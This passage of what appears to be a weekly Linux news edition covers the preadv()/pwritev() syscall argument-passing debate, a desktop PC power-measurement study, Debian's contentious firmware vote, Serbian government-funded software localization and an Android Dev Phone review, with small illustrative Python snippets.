a way to do scatter/gather I/O at a particular offset in the file.  As with
pread(), the current file position is
unaffected.  The calls, which are available on various BSD systems, can be
used to avoid races between an lseek() call and a read or
write.  Currently, applications must do some kind of locking to prevent
multiple threads from stepping on each other when doing this kind of I/O.
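
The semantics can be approximated from user space with the existing pread() call.  The sketch below uses Python's os.pread() to perform one positioned read and then scatters the result into several buffers; the function name preadv_sketch is invented here, and the code only emulates the behavior described above rather than invoking the proposed system call.

```python
import os
import tempfile


def preadv_sketch(fd, buffers, offset):
    """Emulate a scatter read at an offset with a single pread() call."""
    total = sum(len(buf) for buf in buffers)
    data = os.pread(fd, total, offset)  # file position is left untouched
    view = memoryview(data)
    copied = 0
    for buf in buffers:
        chunk = view[copied:copied + len(buf)]
        buf[:len(chunk)] = chunk        # fill this buffer, then the next
        copied += len(chunk)
    return len(data)


with tempfile.TemporaryFile() as f:
    f.write(b"0123456789abcdef")
    f.flush()
    fd = f.fileno()
    os.lseek(fd, 2, os.SEEK_SET)        # some other user of the descriptor
    head = bytearray(4)
    tail = bytearray(3)
    nread = preadv_sketch(fd, [head, tail], 8)
    position = os.lseek(fd, 0, os.SEEK_CUR)
```

Since no lseek() is needed to reach offset 8, a second thread sharing the descriptor cannot slip in between the seek and the read, and the file position remains where that other user left it.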


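The prototypes for the functions look much like readv/writev, simply adding
the offset as the final parameter:

	ssize_t preadv(int fd, const struct iovec *iov, int iovcnt, off_t offset);
	ssize_t pwritev(int fd, const struct iovec *iov, int iovcnt, off_t offset);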

But, because off_t is a 64-bit quantity, this causes problems on
some architectures due to the way system call arguments are
passed.  After Gerd Hoffmann posted version 2
of the patchset, Matthew Wilcox was quick to point out a problem:

	Are these prototypes required?  MIPS and PARISC will need wrappers to
	fix them if they are.  These two architectures have an ABI which
	requires 64-bit arguments to be passed in aligned pairs of registers,
	but glibc doesn't know that (and given the existence of syscall(3),
	can't do much about it even if it knew), so some of the arguments end up
	in the wrong registers.


Several other architectures (ARM, PowerPC, s390, ...) have similar
constraints.  Because the offset is the fourth argument, it gets placed in
the r3 and r4 32-bit registers, but some architectures need it in either
r2/r3 or r4/r5.  This led some to advocate reordering the
parameters, putting the offset before iovcnt to avoid the
problem.  As long as that change doesn't bubble out to user space, Hoffmann
is amenable to making the change:
"I'd *really* hate it to have the same system call with different 
argument ordering on different systems though".
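
The effect of the alignment rule can be seen in a small model.  The Python sketch below assigns arguments to consecutively numbered 32-bit registers, optionally forcing 64-bit arguments to start on an even register; the numbering from r0 simply follows the description above, and real ABIs differ in their details.  The function name is made up for this example.

```python
def assign_registers(args, align_pairs):
    """Map (name, size in 32-bit words) arguments to register numbers."""
    layout = {}
    reg = 0
    for name, words in args:
        if words == 2 and align_pairs and reg % 2:
            reg += 1  # skip a register so the pair starts on an even one
        layout[name] = list(range(reg, reg + words))
        reg += words
    return layout


# Offset last, as in the BSD prototype.
bsd_order = [("fd", 1), ("iov", 1), ("iovcnt", 1), ("offset", 2)]
# Offset moved ahead of iovcnt, as proposed for the system call.
reordered = [("fd", 1), ("iov", 1), ("offset", 2), ("iovcnt", 1)]

unaligned = assign_registers(bsd_order, align_pairs=False)
aligned = assign_registers(bsd_order, align_pairs=True)
fixed_unaligned = assign_registers(reordered, align_pairs=False)
fixed_aligned = assign_registers(reordered, align_pairs=True)
```

With the offset last, the two conventions disagree (r3/r4 versus r4/r5); with the offset in third position, it lands in r2/r3 either way, which is why the reordering makes the problem go away.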


Most seemed to agree that the user-space interface as presented by glibc
should match what the BSDs provide.  Anything else causes too many headaches
for folks trying to write standards or portable code.  To fix the
alignment problem, the reordered arguments are used only by the system call
itself.  That led to Hoffmann's third version of the
patchset, which still didn't solve the whole problem.


There are multiple architectures that have both 32-bit and 64-bit versions,
and the 64-bit kernel must support system calls from 32-bit user-space
programs.  Those programs will put 64-bit arguments into two registers,
but the 64-bit kernel will expect that argument in a single register.
Because of this, Arnd Bergmann recommended
splitting the offset into two arguments, one for the high 32 bits and
one for the low: "This is the only way I can see that lets us use a
shared compat_sys_preadv/pwritev across all 64 bit architectures".


When a 32-bit user-space program makes a system call on a 64-bit system,
the compat_sys_* version is used to handle differences in the data
sizes.  If a pointer to a structure is passed to a system call, and that
structure has a different representation in 32-bit mode than it does in
64-bit mode, the compat layer makes the translation.  Because
different 64-bit architectures do things differently in terms of calling
conventions and alignment requirements, the only way to share
compat code is to remove the 64-bit quantity from the system call
interface entirely.


That just leaves one final problem to overcome: endianness.  As Ralf
Baechle notes, MIPS can be either little or
big-endian, so compat_sys_preadv/pwritev() needs
to put the two 32-bit offset values together in the proper way.  He
recommended moving the MIPS-specific merge_64() macro into a common
compat.h include file, which could then be used by the common
compat routines.  So far, version 4 of the patchset has not
emerged, but one suspects that the offset argument splitting and use of
merge_64() will be part of it.
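
The splitting and merging can be illustrated in Python.  This is a model of the idea rather than a transcription of the kernel macro: the function merge_64() here takes an explicit big_endian flag, which is an assumption made so that both cases can be shown side by side, and split_offset() is a made-up helper.

```python
MASK32 = 0xFFFFFFFF


def split_offset(offset):
    """Split a 64-bit offset into (high, low) 32-bit halves."""
    return (offset >> 32) & MASK32, offset & MASK32


def merge_64(first, second, big_endian):
    """Rebuild a 64-bit value from two registers, in register order."""
    if big_endian:
        # The first register of the pair carries the high half.
        return ((first & MASK32) << 32) | (second & MASK32)
    # On little-endian systems the first register carries the low half.
    return ((second & MASK32) << 32) | (first & MASK32)


offset = 0x123456789
high, low = split_offset(offset)
from_big = merge_64(high, low, big_endian=True)
from_little = merge_64(low, high, big_endian=False)
```

The same two 32-bit values arrive in opposite order depending on the byte order of the system, so the merge step must know which half came first.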


The implementation of preadv() and
pwritev() is straightforward, certainly in comparison to the
intricacies of passing their arguments.  The VFS implementations of
readv()/writev() already take an offset argument, so it
was simply a matter of calling those.  It is interesting to note that, as
part of the review, Christoph Hellwig spotted a
bug in the existing compat_sys_readv/writev() implementations
which would lead to accounting information not being updated for those
calls.


This is not the first time these system calls have been proposed; way back
in 2005, we looked at some
patches from Badari Pulavarty that added them.  Other than a brief
appearance in the -mm tree, they seem to have faded away.
Even if this edition of preadv() and pwritev() does not make
it into the mainline - so far there are no indications that it
won't - the code review surrounding it was certainly useful.  Getting a
glimpse of the complexities around 64-bit quantities being passed to system
calls was quite informative as well.


		Profiling the Power Usage of a Desktop PC


Reducing the power usage of a desktop computer can bring about a number of
benefits. Whether your goal is to save money on your power bill,
reduce your carbon footprint or eliminate unwanted heat and noise from
your office, a bit of effort can produce a more power-efficient computer.
Effort spent reducing power can have an even larger effect on servers and
other machines that run 24 hours a day compared to machines that are
only on during work hours.
This work was done on a nearly ten-year-old PC, but the process still
applies to more modern hardware.


The test setup consisted of an opened-up desktop PC, a P3 International
Kill-a-watt
meter and a collection of peripheral cards and disk drives.
The Kill-a-watt has a 1W resolution; if a reading alternated between
two values such as 8 and 9 Watts, the estimated value was called 8.5 Watts.
Some of the measurements made were small enough that they were
"in the noise".  Other variables included devices with inconsistent
power usage and inconsistent line voltage.
The resulting measurements show the actual power drawn by the power supply;
this may vary from the DC power used by the tested components.
Lastly, the Kill-a-watt meter also shows
power factor;
a fairly consistent value of 0.67 was read.


The tests were performed on the machine while it was in a
number of different software states.  Many of the tests were
done while at the BIOS prompt; disk drive and network adapter
tests were done while the machine was running Linux (Ubuntu 8.10).
Power consumed by external devices such as the LCD video monitor and
amplified speakers was not taken into account.
When a peripheral such as a disk drive was removed for a test, the
drive was disconnected from power and the interface cable was removed
to eliminate possible power consumption by bus termination resistors.


The tested computer used a fairly old but still adequate Asus A7V333
motherboard with an AMD Athlon 1700 processor clocked at 1466 MHz.
The RAID option was not present on the motherboard.  A pair of 256MB PC2700
DIMMs were used for the memory.  The power supply was a 300W Antec PP-303X.
Initially, the machine was loaded down with two hard drives, both
CDR and DVD-RW drives, a floppy drive, an AGP video card with
an ATI Radeon 8500
GPU, and both wired and wireless 802.11 networking cards.


The machine was shut down, all of the PCI and AGP cards were removed
and the disks were disconnected.  The first power test involved the PC2700
memory DIMMs.  With no memory, power consumption was 72 Watts.  Adding
one DIMM caused the power to drop to 67 Watts.  Your author guesses
that with no memory, the CPU runs in some kind of power-consuming
loop.  Interestingly, the two DIMMs had significantly different power
usage.  The Kensington Value Ram with Hynix chips caused the machine to
use 73 Watts versus 67 Watts with the generic Chinese RAM with unbranded
chips.  With both DIMMs installed, power consumption was 75 Watts.
We can deduce that the Kensington RAM used 8 Watts (75 minus 67) while the
Chinese RAM used 2 Watts (75 minus 73).  Sufficient RAM is critical for good
system performance, but the brand seems to be significant in the area of
power usage.  Tests with additional brands of memory seem to be in order.
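

The deduction can be checked with a few lines of Python.  The readings are the ones given above; the variable and function names are invented for this illustration, and the "implied base" figure is a derived cross-check rather than something that was measured.

```python
# Wall-socket readings in Watts, as reported in the text.
READINGS = {
    "no_memory": 72,        # not a usable baseline: the CPU seems to spin
    "generic_only": 67,
    "kensington_only": 73,
    "both": 75,
}


def dimm_power(readings):
    """Each DIMM's share is the drop seen when it alone is removed."""
    kensington = readings["both"] - readings["generic_only"]
    generic = readings["both"] - readings["kensington_only"]
    return kensington, generic


kensington_w, generic_w = dimm_power(READINGS)

# Cross-check: the implied memory-less base should reproduce both
# single-DIMM readings.
implied_base = READINGS["both"] - kensington_w - generic_w
```

The implied base of 65 Watts plus either DIMM's share gives back the 67 and 73 Watt single-DIMM readings, so the three measurements are consistent with each other.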


Fans consume a fair amount of power.  A quick unplugging of the noisy
CPU fan caused the power to go from 75 Watts to 72 Watts.  The CPU
would melt down without this 3 Watt component, so it was left in place.
It may be possible to find a more efficient CPU fan.
The case had a front-mounted "push fan".  This consumed around 2 Watts
of power.  The power supply's built-in fan provides plenty of air
circulation so the front fan was disconnected.  This also made the
machine a bit quieter.


The floppy drive is virtually useless now that 4GB USB memory sticks
can be purchased for under $10.  The floppy drive consumes about one half
Watt of power, so the savings are small.  But big savings can come from
many small cuts, so the device was left unplugged.
The Asus CD-S500/A CDR drive consumed about 1 Watt of power when tested,
and the Sony CRX320E DVD-RW drive consumed about 2 Watts.
Most people can get by with a single removable media drive,
or none at all. The DVD-RW drive would be the obvious choice for a
single-drive system.  If one can put up with the occasional inconvenience
of rebooting, it should be possible to put a DPDT power switch
on the back of the machine to allow shutting off the +5V and +12V
lines to the removable media drive.  All together, the floppy and two
optical drives consumed around 3.5W when idle.


The Radeon 8500 video card was somewhat of a power hog; it consumed
around 8 Watts of power with no built-in fan.
A lower performance ATI-S3 AGP video card consumed 4 Watts.
If high performance video operation (for running Google Earth, for
example) is not critical, the S3 card should be sufficient.  As with
memory, though, the sacrifice in performance may not be worth the power
savings.


The next part of the power test involved the fixed disk drives.
The main boot device was a Western Digital WD600 60GB PATA disk.
It consumed about 7 Watts of power at the BIOS prompt; power went up
by about 5 Watts when the system was running Linux and the drive
was active.  Some of this power is likely being consumed by the CPU
and memory and some is used to power the disk's head actuator motor.
An auxiliary Western Digital WD2500 250GB SATA drive and
associated SATA PCI adapter card consumed around 9 Watts of power when
idle and also about 5 Watts more when active.  Interestingly,
as the machine was more heavily loaded with drives and peripherals,
system activity became less of a factor in overall power consumption.
Hard drives are among the more power-hungry devices
in a system; putting all of your data on a single drive is a good way
to save power.


A generic-brand 10/100 Ethernet controller with an Intel chip consumed
about 1 Watt of power at the BIOS level.  Running Linux and moving
a lot of data across the card caused the power consumption to jump
by about 8 Watts; as with the disk drive test, a lot of that increase
is likely caused by CPU and memory use.  A Hawking Technology HWP54G
802.11 wireless Ethernet card also consumed about 1 Watt when idle
and a few Watts more when busy.


The fully loaded system with 512MB of RAM, two hard drives, two optical
drives, two network adapters, the Radeon video card, the floppy disk drive
and the front fan consumed about 108 Watts of power when idle and a
similar amount when busy.
When the machine was stripped down to one hard drive, no optical or
floppy drives, the lower performance S3 video card and no front fan,
its power dropped to 80 Watts idle and 88 Watts when busy, or between
74 and 81 percent of the original power consumption.
This is enough of a reduction in power usage to justify the effort of
testing.
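

The percentages follow directly from the measured values, as this short Python calculation shows.  The names are invented for the example, and both stripped-down readings are compared against the 108 Watt figure since the loaded machine drew a similar amount whether idle or busy.

```python
FULL_SYSTEM_W = 108   # fully loaded machine, idle or busy
STRIPPED_IDLE_W = 80
STRIPPED_BUSY_W = 88


def percent_of(value, reference):
    """Express value as a percentage of reference."""
    return 100.0 * value / reference


idle_pct = percent_of(STRIPPED_IDLE_W, FULL_SYSTEM_W)
busy_pct = percent_of(STRIPPED_BUSY_W, FULL_SYSTEM_W)
idle_saving_w = FULL_SYSTEM_W - STRIPPED_IDLE_W
busy_saving_w = FULL_SYSTEM_W - STRIPPED_BUSY_W
```

In absolute terms, the stripped-down machine draws 28 Watts less when idle and 20 Watts less when busy.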


Don't forget that even when it is completely powered down, the computer
may still act as a
phantom load; this system consumed a full 3 Watts when it was
off.  An easy remedy to that problem is to route the power plugs for the
computer, video monitor and speakers through a switched power strip.
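

To put the phantom load into perspective, the 3 Watt figure can be converted into energy used over a year.  The sketch below is simple arithmetic in Python; the 16-hours-off-per-day case is an assumed usage pattern chosen for illustration, not a measurement.

```python
def phantom_kwh_per_year(watts, hours_off_per_day):
    """Energy drawn while 'off', in kilowatt-hours per 365-day year."""
    return watts * hours_off_per_day * 365 / 1000.0


always_off_kwh = phantom_kwh_per_year(3, 24)   # upper bound: never on
office_hours_kwh = phantom_kwh_per_year(3, 16) # assumed: on 8 hours a day
```

Even the upper bound is modest, a bit over 26 kWh per year, but a switched power strip eliminates it entirely.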


		Debian goes to the polls


It is general resolution season at the Debian Project.  As was discussed here in October,
Debian seeks to resolve two questions: one regarding types of developers in
the project, and one being the perennial firmware debate.  As of this
writing, the first vote is done, while the second remains open.  But it has
become clear that, regardless of the outcome of the firmware vote, this
issue has stressed the Debian community, perhaps to the breaking point.

Taking the easier subject first: Joerg Jaspert's proposal to create new
classes of Debian developers was always going to be controversial.  The
real purpose of the
associated general resolution was to put the brake on those changes.
That purpose was fulfilled; the winning choice in that (low-turnout) vote
was "Invite the DAM to further discuss until vote or consensus, leading to
a new proposal."  So the project will go back to doing one of the things it
excels at: talking.  What form the membership proposal will have when it
re-emerges from discussion - if it ever does - is unclear.

The other vote - open until December 21 - is essentially about whether the
upcoming "Lenny" release will be delayed until all known violations of the
Debian Free Software Guidelines have been resolved - and whether firmware
blobs in the kernel count as such violations.  The question being asked is
not so simple, though; in fact, Debian developers have no fewer than seven
different options to vote upon.  The nature of this ballot, how it was
constructed, and how it will be decided has led to significant acrimony
within the project.

It is worth looking at what the seven options are (with the actual ballot
text in bold):


 Reaffirm the Social Contract.  The titling of this option is 
     somewhat controversial - all Debian developers committed to supporting
     the Social Contract before gaining their status.  What this option
     really means is "delay the Lenny release until all DFSG violations
     known on November 1, 2008 have been resolved."

 Allow Lenny to release with proprietary firmware.  This option
     allows the Lenny release to happen, as long as no new firmware blobs
     make their way into the distribution.  The language here is quite
     similar to what has been found in the resolutions allowing the Sarge
     and Etch releases to happen despite ongoing firmware concerns.  This
     option has been deemed by project secretary Manoj Srivastava to
     require a three-to-one supermajority vote to pass.

 Allow Lenny to release with DFSG violations.  This choice, also
     requiring a supermajority, has almost the same effect as
     option 2.

 Empower the release team to decide about allowing DFSG
     violations.  Here, the project (again, with a supermajority) would
     say that it trusts the release team to make the right decisions.  The
     team is currently working toward a release which includes firmware,
     so, again, the end result would be about the same: allow the Lenny
     release process to go ahead.

 Assume blobs comply with GPL unless proven otherwise.  The
     actual text of this choice does not mention the GPL at all; in fact,
     it reads very much like options 2 and 3.  However, this one
     was not deemed to require a supermajority vote.

 Exclude source requirements for firmware.  This option (which
     requires a supermajority) says that, for all practical purposes,
     firmware is not software and, thus, a corresponding source
     distribution is not required.

 Further discussion.  This outcome seems inevitable regardless
     of how the developers vote.  If it were to win, though, then the
     outcome of this general resolution would be to decide nothing.


See this posting for the full text of all
seven options.

So why are many Debian developers unhappy with this ballot?  There would
appear to be a few reasons, the first of which is the long list of
options.  Some developers would rather have seen a simple "can Lenny
release or not?" vote, with related issues being handled in a separate
resolution.

The titles given to some of the choices are seen by some as deceptive.  
"Reaffirm the Social Contract" really means "delay Lenny," and "Assume
blobs comply with GPL" goes with a resolution that never mentions the GPL
at all.  Developers who are unhappy with a long, messy ballot are even less
happy with option titles which seem confusing at best, or deceptive at
worst.

Then, there is the matter of the supermajority requirements.  Some
developers wonder why option 2
requires a three-to-one vote, while an almost identical resolution for Etch
did not require a supermajority in 2006.  The decision on majority
requirements is made entirely by the project secretary, who has the task of
determining whether a given resolution "overrides a foundation document" or
not.  A few developers have made the claim that Manoj's decisions are based
less on a clear understanding of what really "overrides a foundation
document" and more on the goal of ensuring that his own favored outcome
wins.

That last is, needless to say, a strong charge.  As it happens, Manoj is
the proposer of the "assume blobs comply with GPL" option; he also seconded
options 1 and 2.  Two of the options he has publicly supported do
not have the supermajority requirement attached to them, so,
perhaps, one could argue that Manoj is, indeed, trying to rig the vote.  On
the other hand, those two options conflict with each other: one would delay
Lenny indefinitely, the other would wave the firmware problem away.  So if
this is an attempt to steal an election, it is one with a highly uncertain
outcome, even if it is successful.  The more straightforward interpretation
- that a long-serving project secretary is interpreting the project's
constitution to the best of his understanding, ability, and good faith - would seem to
be the more likely alternative.

Still, that has not prevented a discussion involving statements like this:


	Recognizing the validity of the vote is not a "must".  The
	alternative is that we end up in a state of constitutional crisis.
	That's unfortunate, but it's also unfortunate that our Secretary is
	failing to act in a manner that safeguards the integrity of that
	office.


Other, more reasoned - but still unhappy - voices are pondering the
replacement of the project secretary.  It turns out that how to do that is
not entirely clear, though.  Some others have asked project leader Steve
McIntyre - who has been conspicuously quiet in this whole discussion - to
intervene.  He finally responded this way:


	I've been talking with Manoj already, in private to try and avoid
	flaming. I specifically asked him to delay this vote until the
	numerous problems with it were fixed, and it was started
	anyway. I'm *really* not happy with that, and I'm following through
	now.


What "following through" means remains unclear.  The Debian project leader
does not command vast powers which can be brought to bear on a problem like
this.  Debian is an exceptional project in that it operates in a democratic
mode under a formal constitution.  Unlike many other projects, Debian lacks
a benevolent dictator or a backing corporation with the ability to force a
decision.  So we do not know what Steve will be able to do to resolve this
issue. 

What we do know is that quite a few developers are going to be unhappy with
this vote regardless of how it comes out.  Talk of "constitutional crisis"
is almost certainly overblown; Debian has muddled its way through no end of
strong disagreements in the past.  But that still leaves a lot of room for
public conflict which further diminishes Debian's reputation and further
delays the Lenny release.  What one can hope is that, somehow, the project
will manage to muddle through to an understanding on firmware that can
prevent all this from happening yet again when the next major release cycle
comes near to completion.

		Localization under a government umbrella


In an era of wider governmental adoption of free software, the Serbian authorities decided
to take a different approach toward the affirmation of GNU/Linux and free
software in the business sector and the general public.  Instead of direct
adoption of free software and open standards, Serbian authorities decided
to fund several localization projects with the goal of helping to improve
the competitiveness of free software on the Serbian IT market.

The first information about the government's plans to help the localization
of Free Software appeared in December 2007, when several Serbian
media outlets reported on the issue. Shortly after the news was revealed, the
official press release from the Serbian Ministry of
Telecommunications and Information Society was published, giving all the
details that were available to the public at that time.  (The release is
now reachable only as a Google cached page; the ministry's site has since
changed and currently offers no resources in English.)

In short, February was set as a deadline for the first results, which meant
localized versions of Ubuntu, Fedora, Mozilla Firefox, Thunderbird and
OpenOffice.org. The projects were funded by the ministry and delegated to
several Serbian computer science faculties for organization and
implementation. All of them, except the Ubuntu localization team, showed
their first results in March at a presentation organized by the
ministry. Ubuntu was late since the localized version was planned for the
LTS (long term support) release which came out in April. Shortly after
Ubuntu 8.04 was released, localized Ubuntu ISOs appeared on the project
servers.

Ubuntu was known as a distribution which didn't have a localized installer
or its characteristic software translated into Serbian. In order to
provide better localization, people from the Faculty of Electrical Engineering
in Belgrade forked Ubuntu and named the new distribution
cp6Linux. The name was widely read as a
symbolic way to write "SerbLinux" since cp6 can be understood as "Serb" in
something that might be considered Cyrillic "leetspeak".  The
development team never confirmed this, though.  "Linux for human
beings who speak (only) Serbian" is packaged in three flavors: Home,
School and Business.  Besides this packaging, the cp6 development
team customized the visual identity and adapted the user interface to make it
more friendly for users coming from Windows.

The most important task and the purpose of cp6's existence is not entirely
completed, but the situation compared to a vanilla Ubuntu installation is a
lot better.  The live disk bootstrap interface and the live system
installer are translated into Serbian.  System tools and package managers
are also localized, but translations of package descriptions and
configuration messages are missing.  The graphical configuration tools
shipped with Ubuntu, like restricted-manager, are translated too, so it
seems that cp6 2008 (which is the first and so far the only version) is
basically targeting localization of the GUI applications and tools.  The cp6 team produced a
52-page user manual under a Creative Commons license (CC-NC-SA), covering the most
important aspects of installing and using cp6Linux 2008.

The Fedora localization
team (Google
translation) took a different strategy and decided to produce localized
flavors of Fedora, with no forks and no new branding. The Serbian Fedora
localization community was already quite well organized and productive, so
the first thing that people from the Faculty of Organization Sciences in
Belgrade did was to get in touch with the translators who already worked on
Fedora. According to them, 19416 of 32480 strings in total were localized
already, and they've localized 98% of 19500 unlocalized strings, which
brings the total to 99% localized strings.

In practice, having almost 100% of the strings localized means localized
configuration tools, package management GUIs and installation interface.
YUM and package descriptions, as with cp6Linux, remain untranslated.
Most of the work was done on Fedora 8, which is available for download from
project servers, with Serbian localization and settings out of the box.
There is no information about ISOs or localization details for Fedora 9 or
10 on the project website.

Mozilla products were localized by people from the Electronic Faculty in
Niš. As in the case of Fedora, the project organizers continued existing
efforts.  The final results, for GNU/Linux and Windows, are Cyrillic and
Latin versions available for download from the project website (Firefox
2.0.0.12 and Thunderbird 2.0.0.9).

Back in Belgrade, localization of OpenOffice.org was delegated to The
Faculty of Mathematics. Again, the project continued existing efforts and
took over the coordination of the official Serbian translation team.  The
first steps toward a localized OpenOffice.org dated back to 2001 when a
group of Serbian free software users got together for a big translation
marathon organized by ICT Tower, a local OSS oriented software company.
Sadly, without any external support, they failed to keep interest in the
project and translations were never updated.  The second big push was in
the summer of 2005 when Novell gave some money to the "prevod.org" group
for improving Serbian localization in SUSE.  Following the OpenOffice
release 2, "prevod.org" members returned to keeping up with GNOME
translations, and once again the OpenOffice.org translation was left
unmaintained.  

"In December 2008 the Ministry of telecommunications and information
society Republic of Serbia started four projects for free software
localization," explains Goran Rakic, Serbian OpenOffice.org native
language project lead.  According to Rakic, the biggest achievements of the
project are localized releases of 2.4, 2.4.1 and 3.0 with
continuity. "We did large QA and localization quality is better then
ever", he states.  Project statistics show distribution of more than
30,000 localized installations via the project site and more than 3000 in
just one week after the 3.0 release. Rakic reveals that localized OOo is
used inside government too, with some large deployments and many more to
go.  Rakic looks into the future saying that the "Ministry and Faculty
of Mathematics in Belgrade signed contract for three years with option to
extend and we are just one year in it.  I can say that future looks bright
for all current and new OpenOffice.org users in Serbia."

It is very hard to give a general conclusion about the implementation and
impact of these projects. First of all, the public was never informed of
any study related to the use of localized versions of any software in
Serbia.  So it's impossible to predict how many users might directly
benefit from those activities.  The only numbers that we can use for any
sort of analysis are download statistics, which don't necessarily reflect
the real amount of acceptance or everyday use of localized programs and
distributions.

Contributions and translations from the Faculty of Organization
Sciences have gone upstream, and cooperation with the Fedora translation
team seems to be established and functioning according to the information
on the Serbian
team page. In contrast, it seems that the cp6Linux translations
didn't go upstream, since there are no noted contributions on Launchpad.
As in the case of Fedora, communication and cooperation is managed on the Serbian Mozilla localization
team wiki.  OpenOffice is the only project that actually took over
coordination of the localization team, at least officially.  Speaking of
distributions, in both cases GNOME is being used as the default desktop
environment, which has a strong and devoted localization community whose
work was packaged in cp6Linux and Fedora in Serbian. GNOME translation is
not a part of government funded activities, though.

In the meantime, the Faculty of Technical Sciences from Novi Sad started to
work on Alfresco localization, and the results are available on the Alfresco Forge
page.

This non-typical approach to free software from the government was
motivated by the expectation that localization will become another
recommendation for Free Software adoption in Serbia, according to Mr.
Nebojša Vasiljevic, assistant of the Minister of Telecommunications
and Information Society for Information society, in his interview for
GNUzilla magazine (issue 36).  He also said that those projects are not part
of any strategy involving switching to free software in governmental
institutions.

		The Android Dev Phone 1


Your editor's long-suffering spouse will attest that gadgets are never in
short supply in the house.  Many of them pass below her interest, but a new
one has come in which has attracted attention throughout the household: an
Android Dev
Phone, otherwise known as the fully unlocked version of the G1 
phone offered by T-Mobile.  This phone is certainly a fun toy, but it has
the potential to be a lot more than that.


The details of this device have been well publicized for a while now.  It
includes a nice touchscreen display, QWERTY keyboard, GPS receiver,
accelerometer, 3.2 megapixel camera, and more.  The whole thing is
powered by Google's Linux-based Android platform.  The Dev Phone is
essentially the same device as that sold by T-Mobile, but with a crucially
important difference: it is unlocked in all senses.  This means not just
that it can be used with any mobile carrier's SIM, but also that the base
operating software has not been locked down.  This is a phone for which the
entire system can be rebuilt and replaced at will.

The Dev Phone thus joins the OpenMoko Neo Freerunner on the very short list
of truly open mobile handsets.  This device, though, has the advantage of
being a bit more of a finished product with what appears to be a rather
stronger software development team behind it.  It also, for what it's
worth, has some nice hardware capabilities that the Neo lacks: quad-band
GSM, 3G (though not on the bands used by your editor's carrier, alas),
keyboard, etc.  Your editor believes that it will be a successful product.


Over the course of the next few months, your editor plans to dig into this
device and report on what he finds.  How open is the device really?  What does
it take to put a new kernel onto it?  What might it take to put a different
operating system onto it altogether?  And, in general, how does this whole
Android thing work?  Assuming that he does not brick the device early on,
your editor hopes to get a real sense for what can be done with this
device, how close its software is to what we normally think of as Linux,
and where it might go into the future.  It should be a fun project.


First, though, one has to get through the stage of simply playing with the
new toy.  So the rest of this article will be a user-level review of
sorts.


The hardware: it feels generally solid.  The device is larger and heavier
than handsets your editor has used in the past, but that is to be
expected.  The keyboard works better than one might think given its size; even your
relatively fat-fingered editor is able to type with reasonable speed and
accuracy.  The vibrator lacks strength.  The camera seems to take nice
photos (for a phone camera), but it is exceedingly slow.  As with most color-screen
devices, the display is entirely unreadable when the backlight is off.  A
nice touch with this phone is an indicator LED which blinks when the phone
has something to tell you - an unread text message, for example - but the
use of the LED seems to be somewhat inconsistent.  


Your editor has yet to get a sense for what the battery life would be in
the absence of children playing with the device all day long.  Complaints
about battery life can be found on the net, but it appears that the phone
should be able to get through two or three days of moderate usage where the
GPS receiver is off most of the time.  On the other hand, if you let your
kids use it to mess around on video sites, the battery runs down relatively
quickly.


On the software side, this phone gets off to a bit of a rough start.  It
first requires the user to configure the phone to access data service from
the carrier, a process which must be done by hand if that carrier is not
T-Mobile.  Your editor's last new phone recognized the carrier from the SIM
and handled this task automatically.  More annoying, though, is that the
phone requires the creation of a Gmail account as part of its setup
process.  The fact that one does not have - and does not want - such an
account is not relevant.  So now your editor has an entry in the Gmail
account database which will never be used.

That, of course, ties in to why Google has gotten into this exercise in the
first place.  There are many features of the Android platform which are
designed to tie the user in more closely to services provided by Google.
Some features, such as the calendar, are really just an extension of the
online offerings.  The phone wants to sync the contacts list
to...somewhere...and turning the feature off leads to unpleasant behavior. 
It is possible to use many of the features of the device without
connecting back to the Google mother ship, but it's not the natural mode of
operation.

Another example is email handling.  There is a separate icon for Gmail which
just works; that application offers the features (such as threading)
provided by that service.  One can run a different mail application to
connect to a POP or IMAP account somewhere, but it's a separate setup
process.  Later, with luck, one discovers the improved K9 client, which must be
installed separately and which requires one to go through the setup process
again.  Even with K9, the non-Gmail mail client is not what it should be.
There is no threading of messages, many basic commands (refiling messages,
for example) are missing, etc.  Then there are little problems like refusing
to connect to a server if it doesn't think it can trust the SSL certificate
and failing to authenticate if the user's password contains special
characters.  One assumes that this client will improve,
or that other clients will be ported to the platform, but, for now, it
doesn't seem to be a priority for the Android developers.


More generally, though, the Android software is pretty slick.  A fair amount of
thought has been given to how interaction should work on this kind of
device.  Once one gets used to a few specific differences (holding a finger
on an item on the screen for a few seconds often brings up otherwise hidden
options, for example), navigating through applications comes fairly
naturally.  Only in some cases do inconsistencies pop up; one that your
editor has noticed is that some applications have different notions of how
to zoom in and out than others.  As a whole, the interface comes
across as polished and attractive.


That said, use of the display could be improved.  On a small display, there will
always be a certain tension between getting enough information on-screen
and avoiding the creation of headaches through severe eye strain.
Some users will do better with small fonts than others.  But if
Android offers an option to configure default font sizes, your editor
cannot find it.  So it becomes necessary to manually zoom almost every web
page, almost every email, etc. to get a sufficient amount of information
onto the screen.  That gets a little tiresome after a while.

The "Android Market" offers a wealth of applications, most of which are
available as free software or, at least, in a free-beer mode.  When
browsing applications, one runs into the Android security model, which is
oriented around a
long set of capabilities which can be granted to applications.  A
program which needs to do things like access the net, obtain location data,
change hardware settings, etc. must declare the capabilities it needs;
these are then presented to the user at installation time.  Most users will
probably just say "yes," but it is worth taking a closer look.  Your editor
decided to decline the installation of a Mahjongg game after being unable
to figure out why it was asking for full network access.
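
To make the capability model a little more concrete: an application lists
the capabilities it wants as uses-permission elements in its
AndroidManifest.xml file.  The sketch below reads such a list from a
manifest in its source (text) form and reports anything beyond what the
user would expect.  The sample manifest, the package name
com.example.mahjongg, and the helper names are all hypothetical; packaged
applications carry a compiled manifest, so this only illustrates the idea.

```python
import xml.etree.ElementTree as ET

# XML namespace used for "android:" attributes in manifest files.
ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Hypothetical manifest for an imaginary game; not taken from any real app.
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.mahjongg">
  <uses-permission android:name="android.permission.INTERNET" />
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
  <application android:label="Mahjongg" />
</manifest>
"""


def requested_permissions(manifest_xml):
    """Return the permission names declared in a text-form manifest."""
    root = ET.fromstring(manifest_xml)
    name_attr = "{%s}name" % ANDROID_NS
    return [
        element.get(name_attr)
        for element in root.iter("uses-permission")
        if element.get(name_attr)
    ]


def unexpected_permissions(manifest_xml, expected):
    """Return declared permissions that are not in the expected set."""
    return sorted(set(requested_permissions(manifest_xml)) - set(expected))


if __name__ == "__main__":
    # A solitaire-style game arguably needs no permissions at all.
    for permission in unexpected_permissions(SAMPLE_MANIFEST, expected=set()):
        print("worth a second look:", permission)
```

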